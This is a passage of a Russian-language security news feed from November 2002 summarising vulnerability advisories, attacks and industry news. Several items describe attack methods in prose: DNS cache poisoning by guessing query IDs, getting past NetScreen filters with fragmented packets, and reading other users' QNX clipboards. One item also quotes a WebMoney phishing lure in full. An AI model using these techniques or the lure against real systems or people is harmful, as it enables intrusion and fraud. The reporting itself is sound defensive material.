На прошлой неделе управляющая доменными именами компания UltraDNS подверглась интернет-атаке, из-за чего администраторам пришлось бороться за сохранение работоспособности серверов, обеспечивающих работу .info и других доменов. Как рассказал директор UltraDNS Бен Петро (Ben Petro), в четверг утром атакующие посылали на каждое устройство, подсоединяющее сеть к интернету, почти по 2 млн запросов в секунду в течение четырех часов. "Это мощнейшая атака, какую мне довелось видеть", - сказал Петро. По его словам, основная система доменных имен (DNS) компании не пострадала, но администраторам в срочном порядке пришлось заблокировать связь с интернет-компаниями, обслуживающими UltraDNS. Атака произошла ровно через месяц после аналогичной атаки на центральные DNS-серверы - базы данных, хранящие критически важную информацию, необходимую для управления доменами высшего уровня. Расследование, вероятно, уже ведется, но комментарии у ФБР и сервис-провайдеров UltraDNS - компаний Verio и WorldCom UUNet - получить пока не удалось. В подобных случаях найти атакующих чрезвычайно трудно. Наводнение сетей запросами - так называемые распределенные атаки на отказ от обслуживания - обычно предпринимаются с использованием подложных обратных адресов через заранее взломанные серверы, что обеспечивает двойной уровень запутывания следов. Источник - http://www.SecurityLab.ru/?ID=34568
27/11/2002 10:23 Последние патчи Microsoft не выполняют свои задачи.
Выпущенные на прошлой неделе компанией Microsoft патчи с номерами 65 и 66 обеспечивает неполную защиту пользователей, заявила на днях датская консультативная фирма по вопросам безопасности Secunia. Компанией заявлено, что в результате анализа обнаружены недостатки в обоих патчах. Сама Microsoft призналась, что патч 65 может быть недостаточно эффективен, однако ничего не заявил про патч 66. Хотя патч 65 предлагает комплексное решение, остается вероятность вредительства через веб-сайты и почтовые вложения в html-формате при автоматической загрузке средств управления ActiveX. Microsoft предложено пользователям удалить его продукты из списка "надежных издателей" и проверять оригинальность ПО перед загрузкой. Ошибка в патче 66 оставляет возможность запускать исполняемые файлы на удаленном компьютере. Исследования Secunia - http://www.secunia.com/advisories/7579/
26/11/2002 16:45 Новая "старая" уязвимость в BIND.
В списке рассылки BUGTRAQ появилось описание уязвимости в реализации DNS-службы от ISC (Internet Software Consortium) под названием BIND. Авторы уязвимости - CAIS/RNP (the Brazilian Research Network CSIRT) и Vagner Sacramento из Бразилии. Суть уязвимости заключается в возможности посылки ложной информации для кэширования в базе данных DNS-сервера. Я бы не стал называть описанную уязвимость новой, поскольку технология проведения атаки описана ещё в 1997 г. Ильёй Медведовским в первой редакции книги "Атака через Интернет" (что было подтверждено в личной переписке с одним из авторов книги Дмитрием Леоновым. При формировании рекурсивного запроса к вышестоящим авторитетным DNS-серверам для разрешения соответствия FQDN (вида, например, www.microsoft.com) в IP-адрес запрос идентифицируется только полем ID в заголовке DNS-запроса. Это поле длиной 16 бит (65535 возможных комбинаций) использутся для различения одного DNS-запроса от других. Таким образом, сформировав шторм DNS-ответов со спуфленного адреса, равного IP-адресу вышестоящего DNS-сервера (прописывается в файле root.cache), можно подставить неверное (сфабрикованное) значение соответствия IP-адреса необходимому FQDN. Отличие от метода Ильи Медведовского состоит только в том, что автор увеличивает вероятность угадывания номера ID запроса, поскольку предлагает предварительно сформировать большое количество идентичных запросов (например, для разрешения www.microsoft.com) от разных машин одной подсети. ПРи этом вероятность угадывания будет определяться, как n-request-sent/65535, где n-request-sent - количество посланных запросов. ПРи проведении удачной атаки последствия её могут быть достаточно серьёзны. Как утверждается в письме BUGTRAQ, возможность атаки существует в версиях BIND - 4.9.11 и ранее, 8.2.7 и ранее, 8.3.4 и ранее. В качестве мер противодействия предлагается обновиться до BIND версии 9.2.1, доступной на сервере ISC, а также ряд локальных мер, например, разрешение выполнения рекурсивных запросов только из сети, за которую отвественнен DNS-сервер, применение средств, предотвращающих спуффинг на файрволлах и граничных маршрутизаторах, помещение DNS-сервера в DMZ (demilitarized zone). Подробное описание - http://www.rnp.br/cais/alertas/2002/cais-ALR-19112002a.html
26/11/2002 14:26 Уязвимости в ПО NetScreen.
NetScreen выпущены бюллетени по безопасности с номерами: 51929, 51897, 52020. Первый из них касается описанной ранее возможности обхода защиты NetScreen при посылке запроса разбитого фрагментированными пакетами. Во втором утверждается о возможности предсказания ISN (Initial Sequence Number - начальный номер последовательности) транспортного уровня (TCP) из-за недостаточного алгоритма случайности формирования этого номера. Возможность предсказания ISN делает возможность проведения атаки типа подмены (IP spoofing) одной из стороны TCP/IP-соединения. Третий бюллетень описывает возможность проведения атаки типа DoS в сервисе, обеспечивающем управление сессиями H.323 (он же Netmeeting). Все вышеперечисленные уязвимости привели к обновлению версии ОС от NetScreen - ScreenOS 4.0.1, до которой всем и рекомендуют обновиться. Бюллетень 51897 - http://www.netscreen.com/support/alerts/Predictable_TCP_Initial_Sequence_Numbers.html Бюллетень 52020 - http://www.netscreen.com/support/alerts/Potential_H_323_Denial_of_Service.html
26/11/2002 12:37 Возможность обхода защиты NetScreen.
Обнаружена возможность обхода защиты, применяемой в ПО, выпускаемом NetScreen. Эта фирмавыпускает программные решения для построения систем защиты файрволлов с организацией защищённых каналов на базе VPN. Системы от NetScreen управляются при помощи разработанной фирмой ОС под названием ScreenOS. После появления червя Code-Red в опции защиты была добавлена возможность блокирования запросов от возможно заражённых червём серверов при помощи опции 'User-Definable Malicious-URL', при помощи которой администратор сервера имеет возможность задания шаблонов "неблагонадёжных" сайтов. Однако было обнаружено, что это ограничение защиты можно обойти, если послать фрагментированный сегмент запроса. В результате датчик защиты не определит, что фрагментированный запрос был равен шаблону и запрос пройдёт внешний рубеж защиты. Подобный "фокус" может быть выполнен при помощи специальной утилиты, позволяющей фрагментировать пакеты и носящей название fragroute ( проживает по адресу: http://www.monkey.org/~dugsong/fragroute/ ). Производитель был оповещён и им была выпущена обновлённая версия ScreenOS 4.0.1, доступная с 1:00PM понедельника (25/11/2002). Подробное описание - http://www.cirt.net/advisories/netscreen.shtml
26/11/2002 11:52 Уязвимость в ОС Solaris.
Группа исследователей компьютерной безопасности из ISS X-Force обнаружила уязвимость в ОС, выпускаемой фирмой Sun Microsystems - Solaris. Уязвимость присутствует в реализации XFS (X Window Font Service) - сервисе, предназначенном для распределения шрифтов с общего сервера в X Window - сети. В компоненте XFS fs.auto возможно переполнение буфера в подпрограмме Dispatch() с последующим выполнением команд в контексте пользователя, от имени которого запущен сервер шрифтов. Так как обычно в Solaris сервер не запускается от имени суперпользователя (root) (запускается от имени "nobody"), для полного компромиса системы необходимо применять дополнительные средства для получения прав root. Сервис fs.auto запускается в Solaris по умолчанию через /etc/inetd.conf и настраивается на непривилегированный TCP-порт (7100/TCP), который обычно блокируется на периметре корпоративной сети средствами файрволла. Однако в незащищённых сетях и интранет (внутренних) сетях уязвимость сохраняется. До применения патча рекомендуется закомментировать строку, имеющую отношение к fs.auto в /etc/inetd.conf и заставить демон inetd перепрочитать файл конфигурации (kill -HUP `pid_of_inetd`). Уязвимость обнаружена в версиях для платформ Sparc и Intel - 2.5.1, 2.6, 7, 8, 9, 9 Update 2. Производителем Sun Microsystems выпущен соответствующий патч. Подробности - http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21541
26/11/2002 11:24 Websense защитит пользователей Сети от "шпионских" программ.
Компания Websense Inc, предлагающая системы фильтрования веб-трафика, добавила в ассортимент услуг "защиту от шпионского ПО" - программ, которые незаметно отправляют компаниям-создателям информацию о работе пользователя в интернете. Шпионское ПО обычно устанавливается либо прямо с веб-сайта, либо является придатком к какой-нибудь бесплатной программе, загруженной из интернета. Такая информация затем используется в маркетинговых целях. Категория "spyware" будет добавлена в фильтр Premium Group III, продающийся компанией по $5 за рабочее место. После того, как очередная "шпионская программа" пошлет информацию на сервер-сборщик, адрес этого сервера будет занесен в базу данных фильтра Premium Group III, и доступ к нему заблокируется. Компания продемонстрировала серьезный вред "шпионских программ" на следующем примере: во время тестирования новой функции фильтра на 12 компьютерах в течение месяца была предотвращена отправка 340 мегабайт "шпионских данных". Источник - http://www.cnews.ru
26/11/2002 11:11 Конференция «Info-Guard '2002» .
Конференция «Info-Guard '2002», посвящённая защите корпоративных сетей от внутренних и внешних атак, состоится 3 декабря 2002года в 10.30 в бизнес-центре отеля "Савой" (Москва, ул. Рождественка, д. 3. Проезд: м. "Кузнеций мост"). Начало регистрации в 10.00. Круг вопросов, который организаторы предлагают обсудить в рамках конференции «Info-Guard '2002»: защита корпоративной сети от злоумышленников из Интернет, защита конфиденциальной информации, находящейся на публичных и корпоративных серверах, защита информационных ресурсов предприятия от разрушительного воздействия компьютерных вирусов, предотвращение утечки информации внутри компании. На конференции будут представлены решения ведущего производителя и поставщика решений для межсетевой защиты WatchGuard Technologies и мирового лидера в разработке программных продуктов корпоративного назначения Computer Associates. На конференцию приглашаются менеджеры высшего звена: руководители предприятий, служб автоматизации и информационной безопасности. Участие в конференции бесплатное. Контактное лицо: Чернобаева Елена press@rainbow.msk.ru. Подробности - http://www.rainbow.msk.ru/news/index.phtml?Id=65
26/11/2002 10:42 Новая почтовая программа AOL посягнет на монополию Outlook
Ситуация на рынке клиентских приложений для работы с электронной почтой может существенно осложниться в связи с новой разработкой корпорации America Online. С таким прогнозом выступает интернет-издание Silicon.com, располагающее информацией о том, что в настоящее время в AOL проходит тестирование нового почтового клиента. Как сообщается, новинка получила название AOL Communicator и представляет собой обновленную версию интернет-пейджера AOL Instant Messenger (AIM) с расширенными возможностями и интегрированным почтовым клиентом, и адресной книгой. Согласно данным Silicon.com, приложение от AOL не уступает по характеристикам пакету Microsoft Outlook, являющемуся рыночным стандартом де-факто, и в значительной степени копирует его интерфейс. Среди преимуществ AOL Communicator, за счет которых он, по мнению разработчиков, способен подорвать монополию Microsoft на рынке почтовых программ, встроенные средства для использования электронно-цифровой подписи, а также интернет-пейджер, интегрированный в почтовую программу. Очевидно, что эти решения, в первую очередь, ориентированы на представителей бизнес-сообщества, где конкуренция с Microsoft Outlook обещает быть особенно жесткой. Источник - http://www.silicon.com/
26/11/2002 10:12 "Relog": новая атака на пользователей платежной систем WebMoney.ru.
"Лаборатория Касперского" сообщает об обнаружении "троянца" "Relog" - очередной вредоносной программы, охотящейся за пользователями платежной системы WebMoney. К случае проникновения на компьютер жертвы, "Relog" предпринимает ряд действий вследствие чего злоумышленники могут получить доступ к счетам WebMoney для их неавторизованного использования. "Relog" рассылается по электронной почте. Зараженные письма выглядит следующим образом (оригинальная лексика сохранена): "Здравствуйте! Вы являетесь пользователем системы WebMoney Transfer. В связи с тем, что в нашей системе произошли небольшие технические неполадки, компания проводит проверку своей БД пользователей. Если к вам пришло уведомительное письмо от сотрудников нашего центра, то вам необходимо пройти процесс перерегистрации. Итак,вы обязаны пройти перерегистрацию до 05.12.02 (Если по какой-нибудь причине, вы не можете пройти процесс перерегистрации до указанного выше срока,то вам необходимо послать нам письмо на support@webmoney-relog.com, уведомляя нас об этом, и указать когда вы пройдете перерегистрацию), в противном случаи все ваши кошельки (со всеми денежными средствами на них) будут уничтожены. Денежные средства в этом случаи возврату не подлежат. И т.д.(полный текст можно посмотреть по ссылке, приведённой ниже)". Рассылаемые письма содержат вложенный файл (RAR-архив с различными именами) с набором программ, необходимых для работы "троянца". В частности, в архиве находятся файлы README.TXT (инструкция по работе с пакетом) и webmoney-relogXP.exe (носитель "Relog"). При запуске последнего пользователю предлагается ввести запрашиваемые данные (в том числе и пароль). После этого "троянец" отсылает злоумышленнику данные, которые позволяют ему получить доступ к WebMoney-счету жертвы и производить с ним любые операции. Подробности - http://www.kaspersky.ru/news.html?id=1103682
25/11/2002 14:58 Сравнительный анализ NT и Unix от Microsoft.
Довольно любопытная ссылка была приведена на сайте www.bugtraq.ru. Приводим её в изложении уважаемого dl. "Очередная утечка из Microsoft. На сей раз - документа, относящегося к временам покупки Hotmail и попытки перевода хотмейловского хозяйства на Win2k (как известно, окончившегося неудачей). Сравниваются уровни безопасности, легкость и прозрачность конфигурирования, стабильность ядра, удобство утилит и т.п. Во всех случаях сравнение далеко не в пользу Win2k". Подробности - http://www.theregister.co.uk/content/4/28226.html
25/11/2002 14:45 Уявзвимость в Microsoft JVM.
В дополнение к обнаруженной уязвимости в реализации Java от Microsoft, LSD (Last Stage of Delirium) Research Group обнаружила уязвимость в виртуальной машине Microsoft (JVM). Обнаруженная уязвимость позволяет обойти защиту "песочницы" (sandbox) Java И выполнить произвольный код при помощи Java-апплета. Возникают довольно широкие возможности по написанию различных вирусов и троянов, использующих уязвимость. Сама технология была представлена на конференции Asia Black Hat Briefings 2002 в Сингапуре. Примеры использования авторы обещают выложит позже. Полный документ доступен в формате PDF, а также в виде Power Point презентации. Может быть очень полезен тем, кто интересуется системой безопасности Java (модели "песочницы" апплетов, секьюрити менеджер, верификатор байт-кода, архитектура загрузчика классов), поскольку во вводной части описывает работу всех компонентов виртуальной машины Java, а также нюансы реализации в популярных броузерах IE и Netscape. Подробности - http://lsd-pl.net/java_security.html
25/11/2002 14:30 Уязвимости в RealOne / RealPlayer.
Марк Литчфилд от имени NGSSoftware сообщает о наличии уязвимости в популярном медиа-броузере, выпускаемом фирмой Real - RealPlayer и его обновлённой версии RealOne. Три обнаруженные уязвимости приводят к возможности переполнения буфера и выполнению кода в контексте пользователя, запустившего приложение. Первая уязвимость описывает возможность ввода слишком длинного внутри SMIL(Synchronized Multimedia Integration Language) - файла, вызывающего переполнение буфера. Вторая уязвимость аналогичного типа, однако в этом случае вводится слишком длинное имя файла, вводимого в поле URL, вида rtsp:// filename внутри, например, .m3u - файла. Третья уязвимость является следствием второй уязвимости, однако происходит, если пользователь при проигрывании файла выберет по клику правой книпки мышки "Edit Clip info" или "Select copy to my Library". Рекомендуется обновиться либо по ссылке, приведённой ниже, либо автоматически, выбрав "Check For Updates" из подпункта "About Real Player" пункта меню "Help". Обновление - http://service.real.com/help/faq/security/bufferoverrun_player.html
25/11/2002 14:12 Backdoor в Alcatel OmniSwitch AOS.
В информационном бюллетене CERT CA-2002-32 объявлено о существовании программной закладки (backdoor) в операционной системе AOS (Alcatel Operating System) версии 5.1.1, применяемой для управления коммутаторами (свичами) Alcatel OmniSwitch 7700/7800. Эта закладка запускает telnet-сервис на порту 6778/TCP, что может позволить удалённому злоумышленнику неавторизованно управлять коммутатором. Администратором свичей рекомендуют обновить ОС до AOS 5.1.1.R02/AOS 5.1.1.R03. Подробности - http://www.cert.org/advisories/CA-2002-32.html
25/11/2002 13:42 Уязвимость в Java(TM) Runtime Environment.
Выпущен информационный бюллетень SUN с номером #00220, в котором констатируется факт наличия уязвимости в реализациях Java фирмы Sun - Java(TM) Runtime Environment. Уязвимость связана с обнаруженным ранее багом библиотеки zlib (двойное высвобождение памяти этой библиотекой может привести к краху использующего её приложения). Как указыавется, уязвимую версию JRE содержат: полная и пользовательская (custom) инсталляций Netscape 7 для Linux, полная и пользовательская инсталляция Netscape 6 для ОС Linux и Windows. Версия 7 для Win32 и версия 4 не имеют уязвимости. Виртуальная машина Microsoft (Microsoft VM) также не обладает уязвимостью. Sun рекомендует всем пользователям обновить свои версии SDK и JRE до вновь выпущенных. Подробности - http://sunsolve.sun.com/security
25/11/2002 13:14 Уязвимость в SAMBA.
Сообщается об обнаружении уязвимости в SAMBA - пакете, для обеспечения доступа к ресурсам UNIX-сервера в NetBIOS-сетях (пакет samba-client, в свою очередь, обеспечивает доступ с UNIX-серверов и десктопов к ресурсам Windows-машин). Была обнаружена одним из разработчиков Samba - Steve Langasek, о чём были сразу оповещены все производители дистрибутивов. Подробности не разглашались до выпуска новой версии Samba - 2.2.7 (мы сообщали о её выходе в новостях на прошлой неделе). Как стало известно, при приёме запроса на изменение пароля и приёме самого закодированного пароля неверно проверяется длина буфера, что, в итоге может привести к его переполнению и записи дополнительных 127 байт, делая возможным выполнение произвольного кода. Уязвимость может быть использована как локально, при использовании приложений, подгружающих модуль аутентификации (PAM - Pluggable Authentication Module) pam_smbpass, так и, в некоторых случаях, удалённо. Для успешного использования бага необходимо, чтобы в системе был запущен Samba-сервер smbd или администратор должен вручную изменить конфигурацию PAM для использования в процессе аутентификации модуля pam_smbpass. Команда разработчиков Samba помимо выпуска новой версии своего продукта обеспечила разработчиков дистрибутивов соответствующими патчами. На данный момент об обновлении версий Samba объявили производители дистрибутивов Linux: SuSe, Gentoo, RedHat, Connetiva. Подробности - http://se.samba.org/samba/whatsnew/samba-2.2.7.html
25/11/2002 12:44 Компьютерная пиратка выплатит Microsoft 11 миллионов долларов.
Американский суд приговорил участницу международной организации, занимавшейся производством пиратской компьютерной продукции, к девяти годам тюрьмы и возмещению 11 миллионов долларов ущерба, причиненного в результате ее деятельности компаниям Microsoft и Symantec, сообщает Associated Press. 52-летняя Лиза Чен (Lisa Chen) была арестована вместе с тремя своими коллегами в ноябре 2001 года по подозрению в причастности к ввозу в США контрафактной продукции из Тайваня на сумму около 98 миллионов долларов. Тогда американскими таможенниками была задержана партия контрафактного программного обеспечения в 100 тысяч экземпляров, в которую входили пиратские копии операционных систем Windows XP, Windows 2000NT и программ Microsoft Office 2000 Pro. Источник - http://www.lenta.ru
25/11/2002 12:03 Cтатья "Применение шифрования и стойкость RSA".
Дмитрий Леонов выложил на www.bugtraq.ru статью Юрия Аверьянова, которая посвящена рассмотрению аспектов криптостойкости алгоритмв RSA и возможности вычисления секретного ключа. Выводы сделанные автором: "...необходимо СРОЧНО ОТКАЗЫВАТЬСЯ ОТ ПРИМЕНЕИЯ АЛГОРИТМА RSA, пока ЕЩЕ ЕСТЬ НЕМНОГО ВРЕМЕНИ для поиска эквивалентной замены. И электронная подпись так и будет оставаться "голубой мечтой" до тех пор, пока не БУДУТ НАЙДЕНЫ БЕЗУСЛОВНОСТОЙКИЕ АЛГОРИТМЫ ШИФРОВАНИЯ С АСИММЕТРИЧНЫМИ КЛЮЧАМИ". Статья - http://www.bugtraq.ru/library/crypto/rsa.html
25/11/2002 11:41 Вырезание баннеров в прокси-серверах.
Открыт сайт под названием ANTIBANNER, посвященный вырезанию баннеров, порно и.т.д. средствами SQUID. Пополняемая библиотека блокировок, орентированность на рунет. Представляет интерес для системных администраторов, настраивающих и обслуживающих прокси-сервера. Ссылка - http://forfreeuse.narod.ru/
25/11/2002 11:10 Выход GCC 3.2.1.
Проект GNU и группа разработичков популярного компилятора GCC объявили о выходе новой версии GCC - 3.2.1. Разработчики утверждают, что планируют в ближайщее время выпустить версию 3.3, версия 3.2.1 была выпущена для устранения замечаний, обнаруженных в версии 3.2, выпущенной 14 августа 2002 г. Устранены баги, возникающие при компиляции исходного кода с задействованными расширениями SSE и MMX для платформы IA-32, также ошибки генеарации кода для платформы x86-64. Полный список изменений - http://gcc.gnu.org/gcc-3.2/changes.html
24/11/2002 12:46 Новые средства обеспечения безопасности и удобства пользования e-mail.
На выставке Comdex были продемонстрированы два новых программных продукта, призванных обезопасить и упорядочить работу с электронной почтой. Компания Creo предложила обновление к своему ПО Six Degree, добавляющему новые возможности поиска и сортировки почтовых сообщений и прикрепленных к ним данных. Австралийская фирма Sentrybay представила программу ViraLock, являющуюся аддоном для Outlook и способную, по заявлениям Sentrybay, полностью обезопасить почтовый клиент от саморазмножающихся вирусов. Обновление от Creo обеспечивает новые способы поиска релевантной информации на жестком диске. При этом создается каталог, облегчающий поиск и сортировку необходимой информации. Отличительной чертой Six Degree является способ отображения результатов запроса. Программа использует реляционный алгоритм для сбора данных, разыскивая информацию, соответствующую запросу, на жестком диске и среди отправленных и полученных сообщений. "Наш продукт подобен Google в миниатюре", - заявляет Марк Леммонс, руководитель отдела разработки ПО компании Creo. По его словам, Six Degree ориентирована на людей, получающих большое количество электронной почты и нуждающихся в упорядочении работы с ней. Разработка Sentrybay позиционируется как средство защиты от саморазмножающихся вирусов. Viralock борется с вирусами, "неся дежурство" между сервером и почтовым клиентом и проверяя входящую и исходящую почту. Программа шифрует адресную книгу Outlook, а также все адреса, содержащиеся в заголовке и в теле почтового сообщения. Это делается, для того чтобы предотвратить распространение вирусов, использующих для "размножения" адреса электронной почты, таких как Klez или Bugbear. Пользователю также предоставляется возможность блокировать получение или рассылку посланий, содержащих потенциально опасные прикрепленные файлы с расширениями .ехе, .dll и .vbe. Пока Viralock работает только с Outlook и Outlook Express, однако компания сообщила, что в 2003 году будут выпущены версии для Netscape и Eudora. Источник - http://www.pcworld.com/
24/11/2002 12:34 Возможность доступа к буферу обмена в QNX.
Ранее мы упоминали об этой уязвимости. Вчера в BUGTRAQ появилось более подробное описание уязвимости. Содержимое буфера обмена сохраняется в системе QNX в виде файла с именем /var/clipboard/localhost/00000000/1.TEXT, где localhost - реальное имя, данное системе, 00000000 - идентификатор пользователя (UID) в 16-ричном виде. Изменяя UID - получаем доступ к содержимому буфера (clipboard) любого пользователя. Тестировалось на QNX 6.2.0 Non-commercial edition для x86-архитектуры. Источник - http://www.4os.org
24/11/2002 12:13 Уязвимость в Netscape Communicator 4.x.
Bennett Haselton из iDEFENSE, Inc. обнаружил уязвимость в популёрном Интернет-броузере Netscape Communicator 4-й версии. Так как путь, в котором Netscape сохраняет настройки пользователя (prefs.js) заранее предопределён, существует возможность получить содержимое этого файла. Для этого мжно использовать методы социальной инженерии и заставить пользователя либо зайти на сайт, содержащий специально созданный скрипт, либо получить содержимое файла через встроенный в Netscape e-mail клиент. Файл содержит важную информацию: реальное имя пользователя, почтовый адрес, адрес почтового сервера, историю посещённых URL и, в некоторых случаях, пароль на почтовом сервере. Версия 6.x Netscape Подобной уязвимостью не обладает. Подробное описание - http://www.idefense.com/advisory/11.19.02c.txt
24/11/2002 11:51 "Повременку" будут вводить с согласия абонента.
Правительственный вариант поправок в федеральный закон "О связи" ко второму чтению будет дополнен пунктом о введении "повременки" только с согласия абонента. Об этом РБК сообщил депутат фракции ОВР Петр Шелищ, который является одним из авторов альтернативного проекта поправок к закону "О связи", который накануне Совет Госдумы решил не принимать к первому чтению из-за отсутствия заключения правительства. В законопроекте предлагалось закрепить на законодательном уровне отношения между абонентом и оператором, а также ввести практику аукционов по распределению нумерации радиочастотного спектра. Кроме того, авторы законопроекта хотели ввести ряд мер для защиты прав потребителя: оставить за абонентом выбор повременной или фиксированной формы оплаты услуг связи, возложить доказательства факта несанкционированного подключения к телефону на оператора. По словам П.Шелища, хотя эти поправки теперь не будут рассматриваться Госдумой, депутатам удалось договориться с представителями правительства о том, что ко второму чтению в правительственный вариант поправок к закону "О связи" будет внесен пункт из депутатского законопроекта о том, что "повременка" может вводиться только с согласия абонента. Источник - http://www.cnews.ru/
24/11/2002 11:39 Novell представил программный сервер Novell Nterprise Branch Office.
Чтобы служащие филиалов были постоянно подключены к своим головным организациям и могли продуктивно работать, не нарушая бюджета отделов ИТ, Novell разработал решение Novell Nterprise Branch Office, специализированного программного сервера, который позволяет организациям надежно и недорого предоставлять своим филиалам комплексные сетевые сервисы без присутствия на местах (в филиалах) штатных сотрудников отделов ИТ. Специализированный программный сервер Novell Nterprise Branch Office поставляется как программное обеспечение только для того, чтобы дать заказчикам свободу использовать по собственному выбору либо новые, либо существующие совместимые аппаратные средства. Он включается непосредственно в существующую сеть и дает пользователям в филиалах моментальный доступ к хранилищам файлов и ресурсам печати, обеспечивая даже автоматическое резервное копирование данных на серверах центров обработки данных. Nterprise Branch Office защищенно действует через быстродействующие линии интернета, устраняя потребность в дорогостоящих и медленных подключениях через WAN и VPN. Сервер Nterprise Branch Office не похож на другие многофункциональные специализированные серверы, потому что он поддерживает отдельный кэшированный каталог локальных пользователей, так что отпадает необходимость пересылать по сети полный корпоративный справочник, что позволяет добиться значительной экономии за счет сужения полосы пропускания и сокращения расходов на управление. Более подробно - http://www.cnews.ru/news/hitechcom/2002/11/22/20021122180325.shtml
24/11/2002 11:02 Германия и Австрия выступят против обязательного хранения журналов подключений к интернету.
Германия и Австрия намерены выступить против предложения властей Евросоюза ввести обязательное для интернет-провайдеров хранение журналов подключений и данных о пользователях. Сейчас информация о пользователях интересует провайдеров исключительно для целей внутреннего учета и уничтожается по мере устаревания. Власти Евросоюза предлагают установить обязательное двухлетнее хранение данных как о пользователях, так и журналы их посещений веб- страниц, списки контактов по электронной почте, однако сами сообщения хранить не будут. Более того, от сотовых операторов потребуют сохранять информацию о географическом положении абонентов. Вся собранная информация должна выдаваться полиции и спецслужбам по мере необходимости при расследованиях того или иного дела. Многие страны Евросоюза высказались за новый закон: его может поддержать Дания, горячо приветствуют Греция, Италия, Люксембург, Испания, Португалия. Не против его введения и Бельгия. Финляндия заявила, что хранение данных в течение двух лет будет введено сразу же после выпуска соответствующего закона Евросоюзом. Источник - http://www.theregister.co.uk/
23/11/2002 21:37 Выход Linux 2.4.20-rc3
Все ближе и ближе выход 20й версии ядра стабильной ветви. На этот раз Тосатти включил в RC:- обновления в VM
- решены проблемы с утечкой памяти в get_vm_area()
- улучшена поддержка nForce chipset
- исправления в NFS коде
Changelog - http://linuxtoday.com/news_story.php3?ltsn=2002-11-22-019-26-NW-KN-DV Download - http://kernel.org/pub/linux/kernel/v2.4/testing/patch-2.4.20-rc3.bz2
23/11/2002 21:33 Выход Linux 2.5.49.
Очередной релиз в нестабильной ветви. Обновления в архитектурно-зависимых модулях, механизме нитей, scsi, работе с разделяемой памятью и многое другое. Changelog - http://lwn.net/Articles/16362/ Download - http://kernel.org/pub/linux/kernel/v2.5/linux-2.5.49.tar.bz2
22/11/2002 23:9 Новая версия Exchange сможет работать на Windows 2000.
Вопреки отдельным сообщениям, следующая версия Microsoft Exchange с кодовым названием Titanium будет работать на Windows 2000. Однако для некоторых функций потребуется .Net Server. Microsoft критиковали за то, что следующая версия Exchange будто бы вынудит заказчиков переходить на .Net Server. В результате поползли слухи, что она не сможет работать на системах под Windows 2000. Это неправда, утверждают представители Microsoft на проходящей в Копенгагене (Дания) конференции IT Forum. «Неужели вы думаете, что Microsoft может выпустить продукт, не допускающий апгрейда?» — заявил продакт-менеджер отделения Microsoft Exchange Крис Бейкер (Chris Baker). Путаница возникла из-за того, что существующая версия сервера e-mail Exchange 2000 не сможет работать со следующей версией операционной системы Windows.Net Server, так что заказчикам не удастся перейти на .Net Server до выхода Titanium в середине 2003 года. На самом деле в первую очередь на .Net Server следует переводить те серверы, которые используются в качестве контроллеров домена Active Directory: это будет способствовать улучшению работы остальных серверов в сети. Серверы Exchange обычно не применяют в качестве контроллеров доменов, поэтому их незачем переводить на .Net Server. Источник - http://zdnet.com.com/2100-1104-966537.html
22/11/2002 11:20 Новое средство защиты от спама от Cloudmark.
Компания Cloudmark, специализирующаяся на программах для персональной защиты от спама, выпустила принципиально новый продукт под названием Authority. В программе использован необычный принцип отсеивания нежелательной почты, основанный на анализе информации, содержащейся в послании. Ранее основным средством защиты от спама, который продвигала Cloudmark, была пиринговая сеть Spamnet. Её создатели по-новому подошли к традиционному способу фильтрации почты, требующего наличия "чёрного списка" адресов электронной почты. Spamnet действововал следующим образом: клиент интегрировался с Outlook, добавляя в его интерфейс свои элементы управления. Пользователь должен был отмечать сообщения, которые он расценивает как ненужное рекламное письмо; информация об этом автоматически оправлялась на один из серверов Spamnet и становилась доступна всем клиетам сети. Созданный коллективными усилиями "чёрный список" позволял дать отпор спаму. Источник - http://www.techweb.com/
22/11/2002 11:02 S-Mail.com стал доступен через почтовые программы.
Компания Network Research Lab объявила о выходе S-Mail Agent - универсального клиента для работы с защищенной почтовой службой S-Mail.com через любую почтовую программу. Установив на своем компьютере S-Mail Agent, владелец почтового ящика имя@s-mail.com сможет получать и передавать защищенную почту через любую почтовую программу с поддержкой POP3/SMTP - будь то Outlook, The Bat! или даже экзотический Pegasus Mail. Network Research утверждает, что S-Mail Agent одинаково хорошо работает со всеми e-mail-клиентами, начиная с наиболее распространенных и заканчивая самыми редкими. "S-Mail Agent действует по принципу локального прокси. Он является как бы промежуточным звеном между вашей почтовой программой и сервером S-Mail, - рассказывает Николай Гудов, технический директор S-Mail.com. - Вы работаете с почтой как обычно, а тем временем S-Mail Agent прозрачно для вас кодирует и раскодирует всю проходящую через него почту - причем используя те же сильнейшие криптографические алгоритмы, которые применяются в S-Mail.com". В течение месяца новый сервис S-Mail.com предоставляется бесплатно, в дальнейшем эта услуга будет доступна в составе тарифного плана Premium. Источник - http://www.cnews.ru/
22/11/2002 10:04 Windows XP версии 2 и серверной версии Longhorn не будет.
Главный вице-президент Windows-подразделения компании Microsoft Брайан Валентайн (Brian Valentine) опроверг появившиеся слухи о том, что компания готовит второй выпуск своей ОС Windows XP. Подозрения о подготовке второй редакции Windows XP в 2003 году начали расти после того, как в качестве предположительнй даты выхода преемницы нынешней ОС, Longhorn, был назван 2005 год. Отрицая подготовку второй редакции Win XP, г-н Валентайн отметил, что все функциональные улучшения и дополнения будут поставляться в составе сервис-пакетов, прежде чем обновится весь код. Несмотря на большой интерес публики, он уклонился от обсуждения свойств, появление которые можно будет ожидать в Longhorn, добавив при этом, что в законченном виде они могут сильно отличаться от нынешних вариантов. Единственное, о чем упомянул г-н Валентайн, это увеличение согласованности в подсистеме хранения данных для обеспечения непротиворечивости именования между, например, веб и почтовой адресной книгой. Также подтвердились более ранние заявления о том, что не будет выпущена серверная версия Longhorn. Следующая сервер-версия ОС, Windows .NET Server 2003, будет выпущена для широкого использования в апреле 2003 года. Поддержка Longhorn-клиента со стороны сервера будет обеспечиваться в ней через соответствующие свойства или сервис-пакеты. Продолжение Windows .NET Server - это давно затерявшийся продукт под рабочим названием Blackcomb, даже на приблизительную дату выхода которого нет сейчас никаких намеков. Источник - http://www.cnews.ru
21/11/2002 15:43 Серьезная утечка внутренней информации из Microsoft.
